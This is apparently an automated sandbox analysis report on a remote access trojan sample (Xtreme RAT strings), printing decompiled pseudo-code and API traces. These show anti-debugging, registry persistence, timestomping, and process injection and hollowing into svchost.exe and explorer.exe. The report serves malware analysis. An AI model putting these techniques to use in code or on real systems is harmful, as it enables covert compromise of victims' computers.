				char _v8;
				intOrPtr _t15;

				_push(0);
				_push(0xc88722);
				_push( *[fs:eax]);
				 *[fs:eax] = _t15;
				E00C817E4( &_v8, "DAEMON");
				_push(0);
				_push(_v8);
				if(( *( *[fs:0x30] + 2) & 0x000000ff) != 0) {
					return 1;
				} else {
					return 0;
				}
			}

0x00c886cf
0x00c886d5
0x00c886da
0x00c886dd
0x00c886e8
0x00c886ed
0x00c886ef
0x00c886ff
0x00c8870b
0x00c88701
0x00c88704
0x00c88704

Strings

DAEMON, xrefs: 00C886E3

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88674, Relevance: .0, Instructions: 21

C-Code - Quality: 100%

			E00C88674() {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t12;
				signed int _t13;

				_t13 =  *( *[fs:0x30] + 2) & 0x000000ff;
				if(_t13 == 0 || _t13 == 0) {
					_v8 = 1;
				}
				_v12 = 1;
				if(_v12 == 1) {
					_t12 = 1;
				}
				if(_v8 == 1) {
					_t12 = 0;
				}
				return _t12;
			}

0x00c88685
0x00c88687
0x00c8868b
0x00c8868b
0x00c88692
0x00c8869d
0x00c8869f
0x00c8869f
0x00c886a5
0x00c886a7
0x00c886a7
0x00c886ae

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C88760, Relevance: .0, Instructions: 5

C-Code - Quality: 100%

			E00C88760() {
				intOrPtr _t7;

				_t7 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc));
				 *((intOrPtr*)(_t7 + 0x20)) =  *((intOrPtr*)(_t7 + 0x20)) + 0x2000;
				return _t7;
			}

0x00c8876a
0x00c8876d
0x00c88774

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C87E20, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
library

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00C87E20() {

				if( *0xc8e034 == 0) {
					 *0xc8e034 = GetModuleHandleA("kernel32.dll");
					if( *0xc8e034 != 0) {
						 *0xc8e038 = GetProcAddress( *0xc8e034, "CreateToolhelp32Snapshot");
						 *0xc8e03c = GetProcAddress( *0xc8e034, "Heap32ListFirst");
						 *0xc8e040 = GetProcAddress( *0xc8e034, "Heap32ListNext");
						 *0xc8e044 = GetProcAddress( *0xc8e034, "Heap32First");
						 *0xc8e048 = GetProcAddress( *0xc8e034, "Heap32Next");
						 *0xc8e04c = GetProcAddress( *0xc8e034, "Toolhelp32ReadProcessMemory");
						 *0xc8e050 = GetProcAddress( *0xc8e034, "Process32First");
						 *0xc8e054 = GetProcAddress( *0xc8e034, "Process32Next");
						 *0xc8e058 = GetProcAddress( *0xc8e034, "Process32FirstW");
						 *0xc8e05c = GetProcAddress( *0xc8e034, "Process32NextW");
						 *0xc8e060 = GetProcAddress( *0xc8e034, "Thread32First");
						 *0xc8e064 = GetProcAddress( *0xc8e034, "Thread32Next");
						 *0xc8e068 = GetProcAddress( *0xc8e034, "Module32First");
						 *0xc8e06c = GetProcAddress( *0xc8e034, "Module32Next");
						 *0xc8e070 = GetProcAddress( *0xc8e034, "Module32FirstW");
						 *0xc8e074 = GetProcAddress( *0xc8e034, "Module32NextW");
					}
				}
				if( *0xc8e034 == 0 ||  *0xc8e038 == 0) {
					return 0;
				} else {
					return 1;
				}
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E34
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E4C
GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000,?), ref: 00C87E5E
GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4,?,00000000), ref: 00C87E70
GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD,00000000,00C882B4), ref: 00C87E82
GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000,00000000,00C881FD), ref: 00C87E94
GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00C880A7,00000000), ref: 00C87EA6
GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00C87EB8
GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00C87ECA
GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00C87EDC
GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00C87EEE
GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00C87F00
GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00C87F12
GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00C87F24
GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00C87F36
GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00C87F48
GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00C87F5A

Strings

Process32FirstW, xrefs: 00C87ED4
Module32Next, xrefs: 00C87F2E
Module32FirstW, xrefs: 00C87F40
Thread32Next, xrefs: 00C87F0A
Toolhelp32ReadProcessMemory, xrefs: 00C87E9E
Thread32First, xrefs: 00C87EF8
Heap32ListFirst, xrefs: 00C87E56
Process32NextW, xrefs: 00C87EE6
Process32First, xrefs: 00C87EB0
Heap32ListNext, xrefs: 00C87E68
Module32NextW, xrefs: 00C87F52
kernel32.dll, xrefs: 00C87E2F
Module32First, xrefs: 00C87F1C
Heap32First, xrefs: 00C87E7A
Heap32Next, xrefs: 00C87E8C
CreateToolhelp32Snapshot, xrefs: 00C87E44
Process32Next, xrefs: 00C87EC2

Memory Dump Source

Source File: 00000005.00000002.15179880413.00C80000.00000040.sdmp, Offset: 00C80000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c80000_svchost.jbxd

Yara matches

Function 00C8A024, Relevance: 51.0, APIs: 9, Strings: 20, Instructions: 262
sleep

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00C8A024(void* __ebx, void* __edx, void* __eflags) {
				short* _t33;
				void* _t34;
				short* _t37;
				short* _t39;
				short* _t42;
				short* _t48;
				short* _t58;
				intOrPtr _t74;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t82;
				intOrPtr* _t83;
				void* _t86;
				void* _t88;
				void* _t90;
				long _t91;
				short* _t100;
				int* _t102;
				void* _t104;
				int* _t107;
				void* _t109;
				intOrPtr _t111;
				int* _t113;
				void* _t115;
				intOrPtr _t117;
				void* _t119;
				intOrPtr* _t126;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr _t162;
				void* _t163;
				void* _t164;
				intOrPtr _t166;
				intOrPtr _t169;
				intOrPtr _t173;
				intOrPtr _t184;
				void* _t190;
				signed int _t194;
				void* _t195;
				void* _t224;
				intOrPtr _t225;
				short* _t228;
				intOrPtr _t233;
				intOrPtr _t235;
				intOrPtr* _t239;
				intOrPtr _t243;
				intOrPtr* _t245;
				intOrPtr _t264;
				WCHAR* _t269;
				void* _t272;
				void* _t273;
				intOrPtr _t274;
				void* _t276;
				void* _t278;

				_t276 = __eflags;
				E00C814F0();
				_push(_t273);
				_push(0xc8a09d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t274;
				_push(E00C812A4(0x1b) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xa) + 1);
				_push(E00C812A4(0xb) + 1);
				_push(E00C812A4(6) + 0x7d1);
				_t33 =  *0xc8f898; // 0xc30000
				_t34 = E00C836D8(_t33, _t276);
				_pop(_t224);
				_pop(_t195);
				E00C83BC4(_t34, __ebx, _t195, _t224);
				_pop(_t225);
				 *[fs:eax] = _t225;
				_t37 =  *0xc8f898; // 0xc30000
				E00C83674(_t37);
				_t39 =  *0xc8f898; // 0xc30000
				E00C83674(E00C836D8(_t39, _t276));
				_t42 =  *0xc8f898; // 0xc30000
				E00C82F90(0x80000001, E00C833A8(L"SOFTWARE\\", 0xc8f38c, _t276), _t276, 2, _t42);
				memcpy(0xc8fccc, 0xc8e07c, 0x607 << 2);
				_t269 = 0xc8ec8a;
				_t48 =  *0xc8f898; // 0xc30000
				E00C82E48(_t48);
				_t228 =  *0xc8f898; // 0xc30000
				E00C82914(0xc914e8, _t228);
				E00C82E48(E00C833A8(L"Software\\Microsoft\\Active Setup\\Installed Components\\", 0xc8f302, _t276));
				E00C82914(0xc91b06, _t53);
				_t58 =  *0xc8f898; // 0xc30000
				_t194 = E00C836D8(_t58, _t276);
				E00C82E48(_t194);
				E00C82914(0xc916f2, _t194);
				if( *0xc8f38a == 1) {
					_t269 = E00C8263C(0, 0, "DSma9HnKaPERSIST");
					_t278 = GetLastError() - 0xb7;
					if(_t278 == 0) {
						CloseHandle(_t269);
					} else {
						CloseHandle(_t269);
						 *0xc8f89c = E00C833A8(L"svchost.exe", 0xc8a704, _t278);
						E00C8291C();
						_t184 =  *0xc8f89c; // 0x1970000
						E00C82E48(_t184);
						_t264 =  *0xc8f89c; // 0x1970000
						E00C82914(0xc8fac0, _t264);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
						_t190 =  *0xc8f8ac; // 0xdc
						E00C83CE4(_t190, 0xc8fccc,  &M00C88EF8);
					}
				}
				E00C81CD8(_t273 - 0x1838, 0x11, 0xc8f2b2);
				_t233 =  *0xc8b0dc; // 0x2ad9cc
				E00C81DBC( *((intOrPtr*)(_t273 - 0x1838)), _t233);
				if(_t278 != 0) {
					E00C81CD8(_t273 - 0x183c, 0x11, 0xc8f2b2);
					_t235 =  *0xc8b0d8; // 0x2a7934
					E00C81DBC( *((intOrPtr*)(_t273 - 0x183c)), _t235);
					if(__eflags != 0) {
						 *0xc8f89c = E00C833A8(0xc8f2b2, 0xc8a704, __eflags);
						_t74 =  *0xc8f89c; // 0x1970000
						 *0xc8f8ac = E00C83EA8(_t74, 0xc91f1c, _t273);
						__eflags =  *0xc8f8ac;
						if(__eflags == 0) {
							_t162 =  *0xc8f89c; // 0x1970000
							_t163 = E00C83A54(_t162, 0xc8f8ac);
							__eflags = _t163;
							if(_t163 != 0) {
								_t164 =  *0xc8f8ac; // 0xdc
								 *0xc8f89c = E00C83B10(_t164);
							} else {
								 *0xc8f89c = E00C83094();
							}
							_t166 =  *0xc8f89c; // 0x1970000
							 *0xc8f8ac = E00C83EA8(_t166, 0xc91f1c, _t273);
							__eflags =  *0xc8f8ac;
							if(__eflags == 0) {
								 *0xc8f89c = E00C83094();
								_t169 =  *0xc8f89c; // 0x1970000
								 *0xc8f8ac = E00C83EA8(_t169, 0xc91f1c, _t273);
							}
						}
					} else {
						 *0xc8f89c = E00C83094();
						_t173 =  *0xc8f89c; // 0x1970000
						 *0xc8f8ac = E00C83EA8(_t173, 0xc91f1c, _t273);
					}
				} else {
					 *0xc8f8ac = 0;
				}
				_t272 = 0;
				 *0xc8f8a8 = 0;
				_t279 =  *0xc8f2b0;
				if( *0xc8f2b0 != 0) {
					_t194 =  *0xc8f898; // 0xc30000
					_t269 = E00C833A8(E00C83420(0, _t194, 0), 0xc8a704, _t279);
					if(E00C83960(_t194, E00C82E48(_t194), _t269) == 0) {
						SetFileAttributesW(_t269, 0x80);
						_t281 = E00C82E48(_t269) + _t155;
						E00C82914(0xc91d10, _t269);
						E00C83CE4(E00C83EA8(E00C833A8(L"explorer.exe", 0xc8a704, E00C82E48(_t269) + _t155), 0xc91f1c, _t273), 0xc91d10, E00C897F4);
					}
				}
				_t79 = E00C833A8(E00C836D8(0xc918fc, _t281), 0xc90fdc, _t281);
				_t239 =  *0xc8b0f0; // 0xc8e01c
				 *_t239 = _t79;
				_t80 =  *0xc8b0f0; // 0xc8e01c
				_t82 = E00C833A8( *_t80, L".xtr", _t281);
				_t241 =  *0xc8b0f0; // 0xc8e01c
				 *_t241 = _t82;
				_t83 =  *0xc8b0f0; // 0xc8e01c
				if(E00C835B0( *_t83) != 0 && E00C87B84(L"local", _t194, _t272) == 1) {
					_t284 =  *0xc8f8ac;
					if( *0xc8f8ac == 0) {
						GetModuleFileNameW(0, "svchost.exe", 0x20a);
						 *0xc8f8ac = E00C83EA8(0xc8fac0, 0xc91f1c, _t273);
					}
					_t245 =  *0xc8b0e4; // 0xc8e024
					_t126 =  *0xc8b0e8; // 0xc8e020
					E00C82B90( *_t126, _t194, L"XTREME",  *_t245 - 0x1e, _t269, _t272, _t284);
					E00C82E14(_t273 - 0x1844, L"XTREME", 0, GetCurrentProcessId(), 0);
					E00C81D10(_t273 - 0x1840,  *((intOrPtr*)(_t273 - 0x1844)), L"SOFTWARE\\", _t284);
					E00C82F90(0x80000001, E00C81CF4( *((intOrPtr*)(_t273 - 0x1840))), _t284, 2, "DSma9HnKa");
					_t138 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t138);
					_t140 =  *0xc8b0e8; // 0xc8e020
					_t241 = 0;
					E00C84600( *_t140, 0xc8f8ac, 0, 0, 0xc91f1c);
					Sleep(0x3e8);
					ExitProcess(0);
				}
				_t286 =  *0xc8f8ac;
				if( *0xc8f8ac != 0) {
					_t86 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t86);
					while(1) {
						_t242 = E00C88BC0;
						_t88 =  *0xc8f8ac; // 0xdc
						 *0xc8f8a8 = E00C83CE4(_t88, 0xc8fccc, E00C88BC0);
						Sleep(0x1f4);
						__eflags =  *0xc8f8a8;
						if( *0xc8f8a8 == 0) {
							_t113 =  *0xc8b0e0; // 0xc8b000
							_t115 =  *0xc8f8ac; // 0xdc
							TerminateProcess(_t115,  *_t113);
							_t242 = 0xc91f1c;
							_t117 =  *0xc8f89c; // 0x1970000
							 *0xc8f8ac = E00C83EA8(_t117, 0xc91f1c, _t273);
						}
						_t272 = _t272 + 1;
						_t90 = E00C8263C(0, 0, "DSma9HnKa");
						_t270 = _t90;
						_t91 = GetLastError();
						__eflags = _t91 - 0xb7;
						_t194 = _t194 & 0xffffff00 | _t91 == 0x000000b7;
						CloseHandle(_t90);
						__eflags = _t194;
						if(_t194 == 0) {
							_t107 =  *0xc8b0e0; // 0xc8b000
							_t109 =  *0xc8f8ac; // 0xdc
							TerminateProcess(_t109,  *_t107);
							_t242 = 0xc91f1c;
							_t111 =  *0xc8f89c; // 0x1970000
							 *0xc8f8ac = E00C83EA8(_t111, 0xc91f1c, _t273);
						}
						__eflags = _t272 - 7;
						if(_t272 >= 7) {
							break;
						}
						__eflags = _t194 - 1;
						if(_t194 != 1) {
							continue;
						}
						break;
					}
					E00C840F8(0xc8e07c, _t194, _t242, _t270, _t272);
					__eflags =  *0xc8f8a8;
					if(__eflags == 0) {
						_t102 =  *0xc8b0e0; // 0xc8b000
						_t104 =  *0xc8f8ac; // 0xdc
						TerminateProcess(_t104,  *_t102);
						E00C88BC0(_t194, _t270, _t272, __eflags, 0xc8fccc);
					}
					__eflags = _t272 - 7;
					if(_t272 >= 7) {
						__eflags = _t194;
						if(_t194 == 0) {
							_t100 =  *0xc8f898; // 0xc30000
							ShellExecuteW(0, L"open", _t100, 0, 0, 0);
						}
					}
					goto L39;
				} else {
					_t119 =  *0xc8f8b0; // 0xd8
					CloseHandle(_t119);
					E00C840F8(0xc8e07c, _t194, _t241, _t269, _t272);
					E00C88BC0(_t194, _t269, _t272, _t286, 0xc8fccc);
					L39:
					_pop(_t243);
					 *[fs:eax] = _t243;
					_push(0xc8a632);
					E00C81B90(_t273 - 0x1844, 5);
					return E00C81B78(_t273 - 0x14);
				}
			}

0x00c8a024
0x00c8a024
0x00c8a02b
0x00c8a02c
0x00c8a031
0x00c8a034
0x00c8a042
0x00c8a04e
0x00c8a05a
0x00c8a066
0x00c8a072
0x00c8a081
0x00c8a082
0x00c8a087
0x00c8a08c
0x00c8a08d
0x00c8a08e
0x00c8a095
0x00c8a098
0x00c8a0a7
0x00c8a0ac
0x00c8a0b1
0x00c8a0bb
0x00c8a0c0
0x00c8a0e3
0x00c8a0f7
0x00c8a0f7
0x00c8a0f9
0x00c8a0fe
0x00c8a10c
0x00c8a112
0x00c8a12a
0x00c8a13a
0x00c8a13f
0x00c8a149
0x00c8a14d
0x00c8a15d
0x00c8a169
0x00c8a17d
0x00c8a184
0x00c8a189
0x00c8a1fd
0x00c8a18b
0x00c8a18c
0x00c8a1a0
0x00c8a1af
0x00c8a1b4
0x00c8a1b9
0x00c8a1c7
0x00c8a1cd
0x00c8a1e1
0x00c8a1f0
0x00c8a1f5
0x00c8a1f5
0x00c8a189
0x00c8a212
0x00c8a21d
0x00c8a223
0x00c8a228
0x00c8a246
0x00c8a251
0x00c8a257
0x00c8a25c
0x00c8a290
0x00c8a29a
0x00c8a2a4
0x00c8a2a9
0x00c8a2b0
0x00c8a2b7
0x00c8a2bc
0x00c8a2c1
0x00c8a2c3
0x00c8a2d1
0x00c8a2db
0x00c8a2c5
0x00c8a2ca
0x00c8a2ca
0x00c8a2e5
0x00c8a2ef
0x00c8a2f4
0x00c8a2fb
0x00c8a302
0x00c8a30c
0x00c8a316
0x00c8a316
0x00c8a2fb
0x00c8a25e
0x00c8a263
0x00c8a26d
0x00c8a277
0x00c8a277
0x00c8a22a
0x00c8a22c
0x00c8a22c
0x00c8a31b
0x00c8a31f
0x00c8a324
0x00c8a32b
0x00c8a32d
0x00c8a344
0x00c8a35a
0x00c8a362
0x00c8a370
0x00c8a379
0x00c8a3a1
0x00c8a3a1
0x00c8a35a
0x00c8a3b5
0x00c8a3ba
0x00c8a3c0
0x00c8a3c7
0x00c8a3ce
0x00c8a3d3
0x00c8a3d9
0x00c8a3db
0x00c8a3e9
0x00c8a401
0x00c8a408
0x00c8a416
0x00c8a42a
0x00c8a42a
0x00c8a434
0x00c8a43f
0x00c8a446
0x00c8a461
0x00c8a477
0x00c8a493
0x00c8a498
0x00c8a49e
0x00c8a4ad
0x00c8a4b4
0x00c8a4b6
0x00c8a4c0
0x00c8a4c7
0x00c8a4c7
0x00c8a4cc
0x00c8a4d3
0x00c8a4f9
0x00c8a4ff
0x00c8a504
0x00c8a509
0x00c8a50e
0x00c8a518
0x00c8a522
0x00c8a527
0x00c8a52e
0x00c8a530
0x00c8a538
0x00c8a53e
0x00c8a543
0x00c8a548
0x00c8a552
0x00c8a552
0x00c8a557
0x00c8a561
0x00c8a566
0x00c8a568
0x00c8a56d
0x00c8a572
0x00c8a576
0x00c8a57b
0x00c8a57d
0x00c8a57f
0x00c8a587
0x00c8a58d
0x00c8a592
0x00c8a597
0x00c8a5a1
0x00c8a5a1
0x00c8a5a6
0x00c8a5a9
0x00000000
0x00000000
0x00c8a5ab
0x00c8a5ae
0x00000000
0x00000000
0x00000000
0x00c8a5ae
0x00c8a5b9
0x00c8a5be
0x00c8a5c5
0x00c8a5c7
0x00c8a5cf
0x00c8a5d5
0x00c8a5df
0x00c8a5df
0x00c8a5e4
0x00c8a5e7
0x00c8a5e9
0x00c8a5eb
0x00c8a5f3
0x00c8a600
0x00c8a600
0x00c8a5eb
0x00000000
0x00c8a4d5
0x00c8a4d5
0x00c8a4db
0x00c8a4e5
0x00c8a4ef
0x00c8a605
0x00c8a607
0x00c8a60a
0x00c8a60d
0x00c8a61d
0x00c8a62a
0x00c8a62a

APIs

Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83721
Part of subcall function 00C836D8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,00000000,00C8A149,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C83775

Part of subcall function 00C83BC4: SystemTimeToFileTime.KERNEL32(?,?,00000000,00C83C74,?,00000000), ref: 00C83C0F
Part of subcall function 00C83BC4: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C20
Part of subcall function 00C83BC4: SetFileTime.KERNEL32(?,?,?,?,?,?,?,?,00000000,00C83C74,?,00000000), ref: 00C83C51

Part of subcall function 00C83674: GetFileAttributesW.KERNEL32(00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C83678
Part of subcall function 00C83674: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,00C89E72,0000181C,00000000,00000000,00000000,00000080,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000), ref: 00C83688

Part of subcall function 00C833A8: VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000004,00C8E07C,?,?,00C89CE6,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C833D1

Part of subcall function 00C82F90: RegCreateKeyW.ADVAPI32(80000001,00000000,?), ref: 00C82FA4
Part of subcall function 00C82F90: RegSetValueExW.ADVAPI32(?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000,00000000), ref: 00C82FBF
Part of subcall function 00C82F90: RegCloseKey.ADVAPI32(?,?,ServerStarted,00000000,?,?,00000000,00C8E07C,00000000,00000000,ServerStarted,?,00C89F0A,00000002,5/3/2018 10:11:44 AM,00000000), ref: 00C82FCE

Part of subcall function 00C83B10: OpenProcess.KERNEL32(00000410,00000000,000000DC), ref: 00C83B23
Part of subcall function 00C83B10: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,000000DC), ref: 00C83B4D
Part of subcall function 00C83B10: 775C13F0.PSAPI(?,00000000,?,00000104,00000000,00000208,00001000,00000004,00000000,00C83B8B,?,00000410,00000000,000000DC), ref: 00C83B64
Part of subcall function 00C83B10: CloseHandle.KERNEL32(?), ref: 00C83B85

Part of subcall function 00C83094: CreateFileW.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000), ref: 00C830BA
Part of subcall function 00C83094: CloseHandle.KERNEL32(00000000), ref: 00C830C0
Part of subcall function 00C83094: VirtualAlloc.KERNEL32(00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302,00000002), ref: 00C830D3
Part of subcall function 00C83094: FindExecutableW.SHELL32(00000000,00000000,00000000), ref: 00C830DE
Part of subcall function 00C83094: DeleteFileW.KERNEL32(00000000,00000000,00000208,00001000,00000004,00000000,00000000,40000000,00000002,00000000,00000002,00000080,00000000,00C8E07C,00000000,00C8A302), ref: 00C830E4

Part of subcall function 00C8263C: CreateMutexW.KERNEL32(?,?,?,?,00C89C68,00000000,00000000,XTREMEUPDATE,00000064,00008007,00000000,00C8A62B), ref: 00C82652

GetLastError.KERNEL32(00000000,00000000,DSma9HnKaPERSIST,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A17F
CloseHandle.KERNEL32(00000000), ref: 00C8A18C
CloseHandle.KERNEL32(00000000), ref: 00C8A1FD

Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

SetFileAttributesW.KERNEL32(00000000,00000080,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A362
CloseHandle.KERNEL32(000000D8), ref: 00C8A4FF

Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000), ref: 00C83CFC
Part of subcall function 00C83CE4: VirtualFreeEx.KERNEL32(000000DC,?,00000000,00008000), ref: 00C83D26
Part of subcall function 00C83CE4: VirtualAllocEx.KERNEL32(000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D35
Part of subcall function 00C83CE4: GetModuleHandleA.KERNEL32(00000000,?,?,000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D48
Part of subcall function 00C83CE4: WriteProcessMemory.KERNEL32(000000DC,?,00000000,00000000,?,?,000000DC,?,?,00003000,00000040,000000DC,?,00000000,00008000), ref: 00C83D50
Part of subcall function 00C83CE4: CreateRemoteThread.KERNEL32(000000DC,00000000,00000000,?,?,00000000,?), ref: 00C83D71
Part of subcall function 00C83CE4: CloseHandle.KERNEL32(000000DC), ref: 00C83D77

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

GetModuleFileNameW.KERNEL32(00000000,svchost.exe,0000020A,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000), ref: 00C8A416

Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,01970000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83ED5
Part of subcall function 00C83EA8: TerminateProcess.KERNEL32(00000000,00000000), ref: 00C83EFA
Part of subcall function 00C83EA8: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,00C91F1C), ref: 00C83F3B
Part of subcall function 00C83EA8: Sleep.KERNEL32(00000064), ref: 00C83F64

GetCurrentProcessId.KERNEL32(00000002,DSma9HnKa,00000002,00C30000,00000000,svchost.exe,0000020A,00000002,5/3/2018 10:11:44 AM,00000000,00000000,DSma9HnKa,0000181C,00000000,00000000,00000000), ref: 00C8A452
CloseHandle.KERNEL32(000000D8), ref: 00C8A49E

Part of subcall function 00C84600: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C846D4
Part of subcall function 00C84600: Sleep.KERNEL32(000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?,00000000,00C848A9,?,00C8FCCC,00000000), ref: 00C846F4
Part of subcall function 00C84600: GetThreadContext.KERNEL32(?,?), ref: 00C84707
Part of subcall function 00C84600: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00C84727
Part of subcall function 00C84600: NtUnmapViewOfSection.NTDLL(?,?), ref: 00C84737
Part of subcall function 00C84600: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8,00000000,?,00000000,00000000,00000000), ref: 00C84758
Part of subcall function 00C84600: WriteProcessMemory.KERNEL32(?,?,00000000,?,?,?,?,?,00003000,00000004,?,?,?,00000004,?,000000C8), ref: 00C84777
